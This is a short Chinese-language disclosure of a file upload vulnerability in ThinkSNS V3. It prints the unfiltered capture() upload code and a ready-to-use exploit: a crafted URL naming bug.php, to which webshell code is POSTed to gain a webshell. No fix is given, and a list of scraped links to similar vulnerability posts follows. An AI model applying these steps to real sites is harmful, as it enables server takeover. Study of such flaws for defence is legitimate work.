thinksns开源微博系统 V3上传漏洞
thinksns v3
漏洞产生文件 attachaction.class.php:
public function capture(){
error_reporting(0);
//解析上传方式
$query_string = t($_SERVER['QUERY_STRING']);
parse_str($query_string,$query_data); //覆盖data变量
$log_file = time().'_'.rand(0,1000).'.txt';
$log_path = RUNTIME_PATH.'/logs/'.date('Y/md/H/');
if(!is_dir($log_path))
mkdir($log_path,0777,true);
$file_path = './data/uploads/'.date('Y/md/H/');
if(!is_dir($file_path))
mkdir($file_path,0777,true);
file_put_contents($log_path.$log_file,var_export($query_data,true));
//按钮截图:FileType=img
if($query_data['FileType']=='img'){
$file_name = 'capture_'.time().'.jpg';
}
//附件上传:FileType=Attachment & FileName=xxx.jpg
if($query_data['FileType']=='Attachment'){
$file_name = $query_data['FileName']; }
//处理数据流
if ($stream= fopen('php://input', 'r')) { //post获取内容
// print all the page starting at the offset 10
// echo stream_get_contents($stream, -1, 10);
$content = stream_get_contents($stream);
file_put_contents($file_path.$file_name,$content);
fclose($stream);
}
//include 'UploadFile.class.php';
//$up = new UploadFile();
//$up->upload('./uploads/');
//$info = $up->getUploadFileInfo();
//echo "<pre>";
//var_dump($_SERVER);
//var_dump($info);
//echo "</pre>";
//输出文件
echo SITE_URL.ltrim($file_path.$file_name,'.');
}
对上传数据过滤不严,产生漏洞,构造URL:
http://目标网址/index.php?app=public&mod=attach&act=capture&FileType=Attachment&FileName=bug.php
POST提交webshell代码至以上url,将会在附件目录下生成bug.php,即获取到webshell。
thinksns开源微博系统 V3上传漏洞相关推荐
- 【网络安全】文件上传漏洞 详解
文件上传漏洞 1.什么是文件上传 将客户端数据以文件形式封装,通过网络协议发送到服务器端.在服务器端解析数据,最终在服务端硬盘上作为真实的文件保存. 通常一个文件以HTTP协议进行上传时,将POST请 ...
- 最新系统漏洞--Victor CMS任意文件上传漏洞
最新系统漏洞2021年11月25日 受影响系统: Victor CMS Victor CMS 1.0 描述: Victor CMS是尼日利亚Victor Alagwu软件开发者的一套开源的内容管理系统 ...
- thinksnsv4.6运行php,开源微博系统ThinkSNS电脑版
用够了其他微博?小编推荐一个智士软件旗下的一个开源微博软件,开源微博系统ThinkSNS电脑版(简称TS)这是智士软件旗下的一个开源微博,社交网络平台,他拥有Web端,安卓,ios和H5手机端,拥有是 ...
- 通达oa php漏洞,通达OA系统傻逼上传漏洞分析,可以直接getshell附EXP
通达oa是一个不错的OA系统,但是这个不错的OA系统,却有一个傻逼上传漏洞,再加上apache的那个奇葩解析漏洞,我靠,简直天作之合啊.下面做一个分析,可以直接getshell附EXP 漏洞的具体版本 ...
- 海康威视iVMS综合安防系统任意文件上传漏洞复现(0day)
0x01 产品简介 海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控.联网报警.智能分析.运维管理等多种安全防范应用系统,构建的多业务应用综合管 ...
- 和信创天云桌面系统VENGD文件上传漏洞复现
1.漏洞概述 和信创天下一代云桌面系统融合了VDI.VOI.IDV三大架构优势的云桌面产品,实现了前后端混合计算,兼顾移动办公和窄带环境下3D高清播放和外设硬件全兼容,满足大规模终端的管理.安全.运维 ...
- 【漏洞复现】海康威视iVMS综合安防系统任意文件上传漏洞复现 (在野0day)
文章目录 前言 声明 一.产品简介 二.漏洞概述 三.影响范围 四.漏洞验证 五.漏洞利用 六.修复建议 前言 海康威视iVMS综合安防系统存在任意文件上传漏洞 ,攻击者可通过构造特定Payload实 ...
- Goby 漏洞更新 |海康威视部分iVMS系统存在文件上传漏洞
漏洞名称:海康威视部分iVMS系统存在文件上传漏洞 English Name:Some Hikvision iVMS file upload vulnerabilitie CVSS core: 9.8 ...
- web安全之文件上传漏洞攻击与防范方法
一. 文件上传漏洞与WebShell的关系 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行.这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等.这种攻击方式是最为直接和有效 ...
最新文章
- Matlab程序咨询,书上程序4-5问题咨询
- 2.6 Word2Vec-深度学习第五课《序列模型》-Stanford吴恩达教授
- pic单片机内部时钟校准c语言,实例讲解PIC单片机的时钟设置
- 大数据WEB阶段 Servlet配置优先级 , Spring容器设置对静态资源放行
- python 档案管理系统_Python 写入档案的 4 个方法
- Git--版本管理的使用及理解
- DBA遇到问题时的30 个反应,你是哪一种?
- html5弹性盒子模型,推荐10款弹性盒子源码(收藏)
- jsdroid 教程_2020年建筑行业资源近2000G免费建筑教程,分享给有需要的建筑同行
- php开发oa系统的插件下载不了,OA系统安装不了office控件的解决方法
- 计量模型 | 固定效应与交互固定效应
- 短租APP开发定制快速搭建
- 计算机网络共享名称乱码,电脑wifi名称显示乱码怎么回事
- 批量上传不同图片(网易邮箱添加附件的应用)
- Android 尺寸转换器(适配各种屏幕)
- web期末网站设计 HTML5+CSS大作业——汽车自驾游(10页) 自驾游主题HTM5网页设计作业成品
- Splay Tree
- 2007年全国硕士研究生入学统一考试(英语一)
- 关于Linux下上网速度慢的问题
- 【ACL2021】对话系统:情感、个性与主题转换